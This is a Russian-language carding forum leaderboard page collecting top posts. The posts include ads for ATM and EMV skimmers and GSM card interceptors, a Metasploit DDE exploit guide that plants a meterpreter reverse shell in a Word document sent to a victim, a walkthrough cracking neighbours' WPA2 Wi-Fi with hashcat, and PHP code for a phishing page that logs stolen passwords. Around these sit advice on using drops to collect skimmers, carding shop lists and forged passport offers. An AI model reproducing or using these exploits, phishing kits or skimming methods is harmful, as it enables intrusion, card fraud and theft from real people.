Таблица лидеров
-
во всех областях
- Все области
- Adverts
- Advert Questions
- Advert Reviews
- Файлы
- Комментарии к файлам
- Отзывы к файлам
- Записи блога
- Комментарии блога
- Изображения
- Комментарии к изображениям
- Отзывы к изображению
- Альбомы
- Комментарии к альбому
- Отзывы к альбому
- События
- Комментарии к событиям
- Отзывы к событиям
- Сообщения
- Статусы
- Ответы на статус
-
Пользовательская дата
-
Всё время
9 октября 2021 - 10 сентября 2025
-
Год
10 сентября 2024 - 10 сентября 2025
-
Месяц
10 августа 2025 - 10 сентября 2025
-
Неделя
3 сентября 2025 - 10 сентября 2025
-
Сегодня
10 сентября 2025
-
Пользовательская дата
23.10.2021 - 23.10.2021
-
Всё время
Популярные публикации
Отображаются публикации с наибольшей репутацией на 23.10.2021 во всех областях
-
9 баллов
-
8 баллов
THIS ADVERT HAS EXPIRED!
- FOR SALE
- NEW
СКИММЕР-ЭТО УСТРОЙСТВО, КОТОРОЕ ПОМЕЩАЕТСЯ ВНУТРИ БАНКОМАТА ИЛИ POS. СКИММЕР EMV ПЕРЕХВАТЫВАЕТ СООБЩЕНИЯ МЕЖДУ ЧИПОВОЙ КАРТОЙ И СЧИТЫВАТЕЛЕМ ЧИПОВЫХ КАРТ ИЗ БАНКОМАТА ИЛИ POS. СКИММЕР EMV ЗАПИШЕТ ИНФОРМАЦИЮ О КРЕДИТНОЙ КАРТЕ, ТАКИМ ОБРАЗОМ, ИНФОРМАЦИЯ О КРЕДИТНОЙ КАРТЕ БУДЕТ УКРАДЕНА. СКИММЕР EMV-ЭТО УСТРОЙСТВО, КОТОРОЕ ПОМЕЩАЕТСЯ ВНУТРИ БАНКОМАТА ИЛИ POS ДЛЯ ПЕРЕХВАТА СВЯЗИ МЕЖДУ ЧИПОВОЙ КАРТОЙ И СЧИТЫВАТЕЛЕМ ЧИПОВЫХ КАРТ ИЗ БАНКОМАТА ИЛИ POS И ЗАПИСИ ИНФОРМАЦИИ О КРЕДИТНОЙ КАРТЕ, ТАКИМ ОБРАЗОМ, ИНФОРМАЦИЯ О КРЕДИТНОЙ КАРТЕ БУДЕТ УКРАДЕНА. Скиммер Emv-это устройство, которое помещается внутри банкомата или POS для перехвата сообщений и записи кредитной карты между чиповой картой и считывателем чипов из банкомата или POS, таким образом, вся информация о кредитной карте похищается. У вас будет быстрый и простой трек 1, трек 2 и PIN-код со всех кредитных карт, которые используют эти банкоматы или POS. Вы можете загрузить информацию с скиммера Emv, подключив телефон или ноутбук по Bluetooth к скиммеру Emv. Такое устройство СКИММЕРА EMV может не только считывать данные владельца карты с чипа, но и перехватывать PIN-код. УСТРОЙСТВО СКИММЕРА EMV создает копию исходной карты, включая все стандартные проверки подлинности SDA-Статическая проверка подлинности данных, DDA - Динамическая проверка подлинности данных, CDA-Комбинированная проверка подлинности данных. С помощью нашего устройства EMV Скиммер вы можете очень легко получить всю информацию о кредитной карте из любого банкомата или POS. С помощью устройства СКИММЕРА EMV вы можете получить трек 1 + 2 + Pin.1,600.00 USD
-
7 баллов
THIS ADVERT HAS EXPIRED!
- FOR SALE
- NEW
ДОСТУПНА НОВАЯ ВЕРСИЯ – НОВЫЙ ИНТЕРФЕЙС, ПОВЫШЕННАЯ АНТЕННА, МОДЕЛЬ V22.3.4 LTE2017-модель 2018 года. Скимминг банкоматов без какого-либо физического контакта. Этот скиммер будет работать без физического подключения к банкомату/POS-машине. Этот продукт является нашим бестселлером и является самым популярным устройством для скимминга кредитных карт во всем мире. Это GSM-перехватчик – скиммер. Он получает данные кредитных карт из банкоматов и POS-терминалов. Небольшой размер 5×4 сантиметра, длина антенны 17 сантиметров. С одной зарядкой он может работать до 8 часов, а изготовленная память может захватывать около 100000 данных кредитных карт, с антенной он может принимать данные в радиусе 50 метров. Устройство может работать от (-25 до +45 градусов). Мы используем батареи 3,7 В 2500 мАч. При одной зарядке устройство может работать до 8-10 часов. Он имеет встроенную память 32 Гб, он может хранить до 100000 данных кредитной карты с pin-кодами. Кратко – Приемник данных GSM-это приемник GSM-модуля, который с помощью специального программного обеспечения клонирует и получает всю информацию о кредитных картах из банкоматов и POS-терминалов. Полученная информация хранится на вашем телефоне или ноутбуке. Чтобы собрать эту информацию, вам просто нужно подключить устройство к компьютеру или мобильному устройству, и устройство отправит данные на ваш компьютер, с помощью программного обеспечения V22.3.4. GSM-приемник также реализовал новую функцию, возможность добавления банка питания для увеличения срока службы скимминга. GSM – приемник данных небольшой, и вы можете легко спрятать его в сумке, одежде, кармане или в автомобиле-рядом с терминалом POS/ATM. Устройство имеет два светодиода – красный и зеленый Красный – Устройство должно заряжаться. Мигающий красный – Устройство может работать еще 30-40 минут, после чего его необходимо зарядить или добавить блок питания или зарядное устройство usb. Зеленый+Красный – Устройство работает. Мигает зеленым – устройство подключается. Цена за GSM перехватчика $1200 USD с доставкой включена. Цена GSM перехватчика + энкодер MSR и 100 пустых пустых карт $1415USD с доставкой включена.1,200.00 USD
-
4 балла
THIS ADVERT HAS EXPIRED!
- FOR SALE
- NEW
Ncr, Wincor Nixdor, Diebold Insert Skimmer.Полный комплект готов к работе. Батарея может работать до 48 часов,наружная температура не влияет на время работы скиммера, так как скиммер находится внутри банкомата.Храните до 15000 дорожек кредитных карт. Полный комплект включает в себя инструменты для вставки и удаления, кабель для передачи данных,компакт-диск с программным обеспечением, это продукт plug and play, который готов к работе. Доступен для заказа PIN-пад в качестве дополнительной опции.1,000.00 USD
-
1 балл
-
1 балл
-
1 баллТеория DDE exploit используется для динамического обмена данных. Эта уязвимость позволяет передавать данные между приложениями MS Office без взаимодействия между пользователями. Этот метод используется для получения доступа к системе. Можно легко отправить файл другу с данными его "переписки" и он с большим любопытством будет открывать этот файл) Установка Необходимые составляющие для проведения атаки: Устройство с Kali Linux. Устройство с Windows. Microsoft Office (Word). Все описанные действия проводились в Kali Linux. Для начала нам необходимо установить компоненты и добавить их в базу Metasploit. Сначала скачаем эксплоит с помощью команды: wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb Далее добавим эту утилиту в папку с эксплоитами Metasploit: mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/ После этого можно переходить в msfconsole. Запускаем и производим обновления всех наших путей: msfconsole reload_all После этого можно переходить к генерации нашей полезной нагрузки. Для этого необходимо пошагово выполнять такие команды: use exploit/windows/dde_delivery Далее нам необходимо установить свой сервис чтобы принимать соединение, для этого нужно указать команду со своим IP адресом: set SRVHOST 192.168.177.141 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.177.141 set LPORT 6708 exploit exploit Подготавливаем документ MS Office После этого получаем ссылку, которую нужно вмонтировать в документ MS Office. Для этого переходим в раздел "Вставить"->"Быстрые элементы"->"Поле" (Можно использовать быструю комбинацию CTRL + F9). {DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.1.6:8080/wi9o8uanVgkjv”} После открытия документа откроется сессия. После открытия будут два всплывающих окна. Но они без каких либо запретов, просто уведомления о наличии сторонних связей с другими приложениями. Готовая ссылка Получаем сессию Заключение Вот таким способом можно получить доступ к компьютеру. Дальше смотрите в сторону пост эксплуатации. Там есть очень много чего интересного. Любите своих друзей и не заставляйте их скучать. Можно пошутить вот таким простым, но эффективным способом. Также формулы можно использовать и в других программах MS Office. Для более правдоподобного вида нужно наполнять документы тематическим содержанием.
-
1 балл
-
1 балл
-
1 балл
-
1 балл
-
1 баллНаконец то прошел обучение , около недели сидел пыхтел , но вы знаете , смею доложить , что тема оооочень актуальна в наши дни и профиты лопатой по сути грести можно
-
1 баллмногие пользователи наверняка задумались о том, как отключить подобные возможности своего браузера.
-
1 балл
-
1 баллОтличная схема и обучили довольно быстро, главное не тупить Рад, что связался с тобой !)
-
1 баллЯ всегда был фанатом багов и уязвимостей «на поверхности», всегда завидовал чувакам, которые пишут эксплойты для самых защищённых ОС, а сам умел только скрипткиддить (термин из нулевых). И сегодня я хотел бы на пальцах показать и рассказать про такую штуку, как вардрайвинг. А точнее, как стандартными средствами MacOS можно добыть пароли от Wi-Fi соседей. Нелёгкая забросила меня на очередную квартиру. Как-то исторически сложилось, что я ленивый. Пару лет назад я уже писал, что моя лень, новая квартира и провод Beeline (бывшая Corbina) помогли мне найти багу у Билайна и иметь бесплатно интернет в их сети. «Сегодня» происходит «подобное», я на новой квартире, нет даже провода, но есть много сетей у соседей. Заколебавшись расходовать мобильный трафик, я решил, что «соседям надо помогать», и под «соседями» я имел введу себя… Когда-то давно я увлекался вардрайвингом, как раз именно до того момента, пока не обнаружил в старой квартире провод Билайна.) Там тоже было много сетей рядом и первое, что пришло в голову — мне нужен wi-fi. С тех пор прошло много лет. Обновляя свои данные про вардрайвинг, я нашёл в сети упоминание, что 90% работы спец.утилит «сегодня» можно сделать стандартными сервисами MacOS. Забегая вперёд, я хотел бы отметить, что не являюсь автором данного метода, я сам нашёл его в забугорном инете, просто, скажем, это вольный перевод и подробное, художественное описание способа добыть wi-fi пароли стандартными методами макоси, не более. Принципы добычи паролей соседского Wi-Fi Надо понимать, что имея Wi-Fi-приёмник, который есть сегодня в любом ноутбуке, ты можешь «снифать» весь беспроводной трафик около себя. Раньше, когда сети были открыты, достаточно было прийти в макдак и за вечер можно было получить 100-200 акков к одноклассникам. Открытая сеть + отсутсвие https делали своё дело. Сейчас всё интереснее, все переходят на https (пользуясь случаем, хочу передать привет Lets Encypt. Любимый Lets Encypt, я в телевизоре и передаю вам привет, спасибо, что вы есть) и даже про WEP уже все забыли, все роутеры юзают WPA2. Но, как известно, меч был придуман раньше щита, и никакой WPA2 не помеха человеку, голодного до интернета и видящего около себя кучу Wi-Fi. Продолжим. Имея Wi-Fi карту, т.е. любой современный ноутбук, мы можем снифать трафик возле себя. Но он бесполезен, ибо зашифрован. Единственное, что можно разобрать из него — метаданные, типа название сетей итп и «рукопожатия», handshake, т.е. авторизации пользователей в сети. Они происходят каждый раз, когда пользователь подключается к wi-fi-сети. Например, когда сосед приходит домой и его смартфон в кармане цепляется к домашнему wi-fi. Если совсем грубо, рукопожатия представляют собой обычный хэш типа md5. Это правда совсем грубо. Ключ там получается путем 4096 раундов SHA1. Если быть точным, то формула такая: Key = PBKDF2(HMAC−SHA1, passphrase, ssid, 4096, 256) Кстати, можно заметить, что замешивается название точки, поэтому при уникальном названии предвычисления не помогают. И это аргумент за то, чтобы менять название точки на свое. И да, я солгал в своём первом абзаце про «дешифрацию», это техническая ошибка и подмена понятий. Конечно, дешифровать хэш невозможно. Это как говорить «лицензия такси», зная, что деятельность такси в РФ не лицензируется. Но просто так удобней ) Так вот. Всё, что нам надо — это найти среди траффика радиосети вокруг себя рукопожатия и «дешифровать» их. И раньше была куча софта для всего этого. Кто-то умел грамотно сканировать радиоканал, кто-то отлично его сниффал в дампы, кто-то находил хэши в дампах, кто-то умел их ломать. Сейчас всё стало проще, благодаря Тиму Куку. 90% работы за стороннее ПО делает стандартное приложение «Беспроводная диагностика». Многие его видели — когда проблемы с Wi-Fi, мак предлагает проверить сеть. Бесполезная утилита, которая даёт советы типа «перезагрузите роутер». Ну, т.е. мне так казалось ) Добываем пароли. Соседи вешайтесь Итак, погнали. Зажимаем Alt и кликаем по логотипу Wi-Fi в верхней панели. Вообще Alt и клик всегда открывает дополнительные опции в MacOS, но это тема отдельного топика. Помимо прочей доп.инфы, которая порой очень полезная, мы можем запустить программу «Беспроводная диагностика». Думаю, все кто пользуются маком, помнят это окно. Но нас интересует другое. Кликаем по пункту меню «Окно» и видим набор дополнительных утилит. И тут прям есть всё, что надо, даже больше ) Конкретно нас интересуют 2 пункта. Сканирование и Анализатор. Первый покажет нам все сети вокруг с доп.инфой, типа на каком канале и на какой частоте работает сеть. Второй пункт позволит сниффать трафик на конкретном канале и частоте. Нажимая на кнопку «Начать» в Анализаторе, Wi-Fi-карточка переключится в режим приёма и начнёт сканировать радиочастоту вокруг себя, дамп будет писаться в /var/tmp. Файлы *.wcap это наши дампы, которые содержат бесполезный для нас траффик и нужные нам рукопожатия. Надо понимать, что нам необходимо поймать именно рукопожатия. Т.е. нам надо поймать и сниффать траффик, когда сосед приходит домой вечером. Либо, если у вас есть ещё одно устройство на макоси, либо любой другой оси, вам помогут нюкеры. Программки, рассылающие поддельные команды деаунтефикации. Например, JamWiFi. Но это если прям совсем не терпится ) На моём опыте, достаточно просто запустить Анализатор в 6 вечера на часок. Далее нам надо поставить naive-hashcat и hashcat-utils. «Стоп» скажите вы, «ты же обещал взлом сетей соседа стандартными методами?» ) Ха! И вы мне поверили?! На самом деле мы стандартными методами сделали 90% работы через GUI. У нас уже есть хэши, всё что нам надо — разбить их. Уверен, можно всё сделать и стандартными утилитами, но проще юзать hashcat. Собираем софт через brew или из сорцов. Первым делом нам надо конвертировать наш дамп, оставив в нём только наши хэши. Этим занимается бинарник cap2hccapx из пакета. # Качаем hashcat-utils git clone https://github.com/hashcat/hashcat-utils.git Cloning into 'hashcat-utils'... remote: Counting objects: 403, done. remote: Total 403 (delta 0), reused 0 (delta 0), pack-reused 403 Receiving objects: 100% (403/403), 114.23 KiB | 61.00 KiB/s, done. Resolving deltas: 100% (257/257), done. # Собираем бины cd hashcat-utils/src/ && make rm -f ../bin/* rm -f *.bin *.exe cc -Wall -W -pipe -O2 -std=gnu99 -o cap2hccapx.bin cap2hccapx.c cc -Wall -W -pipe -O2 -std=gnu99 -o cleanup-rules.bin cleanup-rules.c … cc -Wall -W -pipe -O2 -std=gnu99 -o strip-bsr.bin strip-bsr.c cc -Wall -W -pipe -O2 -std=gnu99 -o strip-bsn.bin strip-bsn.c # Конвертируем дамп ./cap2hccapx.bin /var/tmp/2018.01.25_00-37-45-GMT+3.wcap /var/tmp/home.hccapx Мы видим, что успели перехватить 2 рукопожатия, попробуем «сломать их». Для этого нам нужен naive-hashcat: git clone https://github.com/brannondorsey/naive-hashcat cd naive-hashcat # Собираем софт для osx ./build-hashcat-osx.sh # качаем вордлист для побора wpa/wpa2 сетей пароли (134MB) curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt # указываем адрес нашего дампа и файл, куда будем писать подобранные пассы, 2500 это метка хэшкэту, что надо ломать именно WPA, ну и запускаем naive-hashcat HASH_FILE=/var/tmp/home.hccapx POT_FILE=home-wifi.txt HASH_TYPE=2500 ./naive-hashcat.sh Кошка пошла работать. В среднем у меня на маке я имею скорость в 2000 хешей в секунду, на скрине 7к, но это только старт. Судя по этому документу, на 1080gtx можно получить скорость в 400к хешей в секунду. Однако у меня всего 2 рукопожатия и не такой уж и большой словарь, поэтому пробежаться по нему не составило проблем. Смотрим файл home-wifi.txt, вуаля: Вот и всё. К сожалению, эта сеть через несколько квартир от меня и на другом этаже, пинг 7 секунд ) Надо ловить соседа снизу или брать внешнюю wi-fi-карту с нормальной антенной. Но принцип, думаю, понятен. Удачных сканирований вам, юные подованы вардрайверы. И большое спасибо разработчикам Kali Linux MacOS за такие подарки.
-
1 баллсегодня пришло все, залив просил на мегафон , проблем в общении не возникло, хотя я долго не мог достутчаться до продавца
-
1 баллКое какие моменты не понимаю , отпиши в ЛС , пожалуйста , а то прилюдно стыдно такие вопросы задавать
-
1 баллТак как нет смс оповещения к карте я не знаю через сколкьо пришли деньги, утром занес депозит, вечером снял лавешку. От души, родной.
-
1 балл
-
1 балл
-
1 балл
-
1 балл
-
1 балл
-
1 балл
-
1 балл
-
1 баллЧто то подобное уже видел)) Но все равно круто! Думаю кому пригодится) Присоединяюсь к http://www.redbullracingshop.com.au/ http://www.shopjeen.com/ shaneco.com cc+vbv http://www.joyetech.co.uk/ сиги электронные www.eddiebauer.com fallen hero www.joebrowns.co.uk вбв llbean http://www.nbastore.com (shoes and clothing) https://www.footballfanatics.com/ Новички в теме фешевухи, тренеруйтесь
-
1 балл
-
1 балл
-
1 баллЗаключённый Нил Мур (Neil Moore) совершил побег из лондонской тюрьмы, обманув охранников поддельным письмом об освобождении, однако через несколько дней после обнаружения пропажи сдался в руки правосудия. 13 марта адвокаты приехали в тюрьму лондонского района Уондсворт, чтобы поговорить с 28-летним заключённым Нилом Муром, однако, к своему удивлению, не обнаружили его в стенах исправительно учреждения. Как выяснилось, Мур, обвиняемый в мошенничестве, каким-то образом беспрепятственно покинул свою камеру тремя днями ранее. В результате дальнейшего расследования выяснилось, что мужчине удалось раздобыть в тюрьме смартфон, с помощью которого он и реализовал свой план. С помощью устройства Мур создал поддельный домен, почти не отличающийся от того, что используется судебной службой, и отправил на электронную почту тюрьмы, где отбывал наказание, инструкции к своему освобождению. Для дополнительного реализма мошенник также зарегистрировал поддельный сайт, к которому отсылалось письмо, на имя детектива-инспектора Криса Сула (Chris Soole) с указанием всех необходимых контактных данных Королевского суда. Прокурор Йен Пэтон (Ian Paton), занимавшийся расследованием побега, назвал произошедшее «примером чрезвычайной уголовной изобретательности и коварства». Ранее Мур использовал четыре поддельных личности, чтобы присвоить около 1,8 миллиона фунтов стерлингов. Выдав себя за представителей нескольких банков, он убедил коммерческие организации доверить ему крупные суммы денег. Зачастую мошенник разыгрывал для своих жертв целые спектакли, говоря за несколько сотрудников банка мужскими и женскими голосами, якобы передавая телефонную трубку. Спустя три дня после обнаружения пропажи Мур сдался властям и признался в восьми случаях мошенничества и побеге. Приговор ему будет вынесен 20 апреля.
-
1 баллВсем привет. Сегодня покажу вам как сделать фейк, многие мануалы не понятно расписаны новичкам, потому-что в них требуются хотя бы начальное знание азов HTML. Чтож в моем обучающем мануале, такого не будет, распишу все очень очень понятно. Ну все начали)) Заходим на страницу, которую нам надо подделать. Нажимаем CTRL+S Все мы сохранили страницу. Можем сделать так: сохранить как Если картинки не грузятся, то просто скачиваем их, или скриним. Потом в скачанном файле, прописываем путь к ним. Или же способ немного лучше, но потруднее: Открываем исходный код делается это так CTRL+U Прописываем абсолютные пути ко всем картинкам и таблицам стилей (оригинальным). Это чтобы картинки и ЦССки грузились с сервака. Теперь открываем блокнотом или любым другим редактором. Займемся поиском тегов, которые относятся к Логину и Паролю [Ведь смысл фейка красть логин и пароль] меняем значение аттрибута action на Submit.php Слово action можно найти воспользовавшись поиском. Получится так >>> action="submit.php" Сейвимся, Клосаем. Делаем файл submit.php Пишем туда следующее: <?php /** * xakarders.ru * Это я вам CyKa фейк сделал * vzlom.htm */ @include 'config.php'; $req=array( 'HTTP_REFERER'=>$_SERVER['HTTP_REFERER'], 'HTTP_USER_AGENT'=>$_SERVER['HTTP_USER_AGENT'], 'REMOTE_ADDR'=>$_SERVER['REMOTE_ADDR'], 'REMOTE_PORT'=>$_SERVER['REMOTE_PORT'], 'REQUEST_URI'=>$_SERVER['REQUEST_URI'], 'REQUEST_TIME'=>$_SERVER['REQUEST_TIME'], ); $desc=fopen('logs.txt','at+'); fwrite($desc,print_r($req,true)."\n\n\n".print_r($_REQUEST,true)."\n\n\n=====================\n\n\n"); fclose($desc); header('Location: '.$loc); ?> Создаем файл config.php <?php /** * Это я вам CyKa фейк сделал * vzlom.htm */ // Сюда впишите ссылку на переадресацию: $loc='http://suka.ru'; ?> Остался самый последний штрих. Создаем наш корзинку, куда получим данные. А т.е. logs.txt Теперь создаем аккаунт на любом бесплатном хостинге. Заливаем через FTPешку, Везде поставьте полномочия 777, иначе пароли не придут. Впариваем жертве. И ОК. Получаем пароль в корзинку.
-
1 баллСамый надежный вариант купить скиммер, является работа через гарант-сервис кардинг форума. Важные моменты на счет доставки скиммеров, как не попасть в разработку: Самое важное - никаких личный встречь! Самый надежный вариатом доставки скиммера является проводник поезда дальнего следования. На поучение оборудование крайне не рекомендуется являться самому, на много безопаснее будет найти дропа, который за 500-1000р. сходит и получит посылку. Хранение скиммеров противоречит законам РФ и является основанием возбуждения уголовного дела. Также после отработки банкомата персональная рекомендация от меня, не идите сами снимать скиммер с АТМ, найдите разового дропа у метро и предложите пару тысяч рублей (если совсем параноики, ищите дропа не сами, а через знакомого). И отберите у него телефон перед тем как будет снимать скиммер, так как Банкомат фиксирует даже выключенные аппараты.
-
1 баллкто ни будь сможет меня научить пользоватся палкой, и все подробно расскащать?
-
1 баллПишите в аську либо на мыло enzo83@inbox.ru Актуально, в продаже комплекты со всеми страницами паспорта + доп. документы.
-
1 балл
-
1 баллЕсть еще вариант вкладывать в антикварные ювелирные изделия, они всегда будут цениться, особенно с прошествием времени... А если и инвестировать в драгоценности, то непосредственно в их добычу...
-
1 баллпо фото оценить не реально, их легко подделать и нужных деталей как техника, цветопередача, материалы, колористика фото не покажет. для оценки нужен детальный анализ
-
1 баллобновление базы уже 14 сайтов цена 2000р
-
1 балл
-
1 баллну если там симка есть значит будет определяться, как на сотовом операторе скинь модем, с симкои и все
-
1 баллДампы. Встретил наконец адекватную прошивку. Расстояние только пока 10 см с натяжкой.
-
1 балл
-
1 балл
-
1 баллнету такого понятия "средний кардер" .В мире кардинга абсолютно разные профили,и доходы соответственно разные!!! кто-то ломает,другие заливают,третие налят,четвертые работают со счета (это так,простым языком),очень много разных направлений
-
1 балл
-
1 баллАСАВ я себе депозитный счёт делал для себя официально по совему паспорту в МДМ банке, в торговом центре, там небольшой филиал, там постоянно пополняю его, при заключении договора ваабще не проверяди паспорт, при пополнения не проверяют паспорт, просто с него данные списала девушка и всё...
-
1 баллХарактер возможной КРИМИНОГЕННОСТИ обусловлен, прежде всего, масштабностью мотивов. Да, в натуре Скорпиона присутствуют и мстительность, и беспощадность, и поистине самурайское терпение в ожидании часа страшной мести. Скорпиона отличает от других знаков Зодиака именно масштабность, шекспировская глубина мотивов злодеяний. Скорпион - убежденный индивидуалист, он, как правило, напрочь лишен стадного инстинкта, это своеобразный граф Монтекристо, мститель-одиночка. Скорпионы лишь в исключительных случаях участвуют в групповых преступлениях, дьявольски изобретателен в планировании преступлений. Своей конечной целью ставит не столько видимый результат и не столько мучения жертвы, но сам факт свершившегося возмездия. Скорпионы-убийцы сочетают в себе незаурядную дерзость и столь же незаурядную осмотрительность при совершении преступлений. Можно не сомневаться, что большинство виновников в нераскрытых убийств - Скорпионы. В общем, числе убийц занимают весьма скромное одиннадцатое место, но в списке особо опасных - четвертое. Скорпионы-насильники, как правило, руководствуются в своих действиях соображениями мести, а не разрушения, как такового. Скорпион может изнасиловать жертву, которая нанесла ему значительный ущерб или оскорбила его тем или иным образом. В общем, списке насильников они на последнем месте.
-
1 балл
-
1 баллВсем привет. Начал ковырять смарт карты. Подключил осциллограф к контакту I/O смарт карты и возник такой вопрос - как определить какие именно данные передаёт сама карта и какие данные передаёт аппарат который подключен к карте? Дело в том что все данные смешаны а мне надо проанализировать отдельно данные которые идут с карты на аппарат и наоборот проанализировать данные которые идут с аппарата на карту. Спасибо.
-
1 баллХарактер возможной КРИМИНОГЕННОСТИ обусловлен, прежде всего, властно-агрессивной натурой Льва с установкой на решительное подавление любого противодействия. Лев лишен тревожности, ему чужда зависть или мстительность. Завышенная самооценка сочетается в нем с непоколебимой верой в свою правоту и дерзкой решительностью для достижения поставленной задачи. Для Львов характерны отчаянные разбойные нападения, террористические акты, но без изощренной жестокости. Лев способен пустить поезд под откос, но не будет мучить жертву раскаленным шилом. Львы-убийцы отличаются дерзостью и масштабностью действий, несколько показной демонстрацией силы и азартностью. Львы-насильники руководствуются крайним тщеславием, игнорированием каких бы то ни было запретных барьеров и стремлением сломить сопротивление жертвы, подчинить ее своей воле и продемонстрировать свое превосходство. В списке убийц Львы занимают первое место, но среди особо опасных преступников занимают пятое место, насильников - седьмое.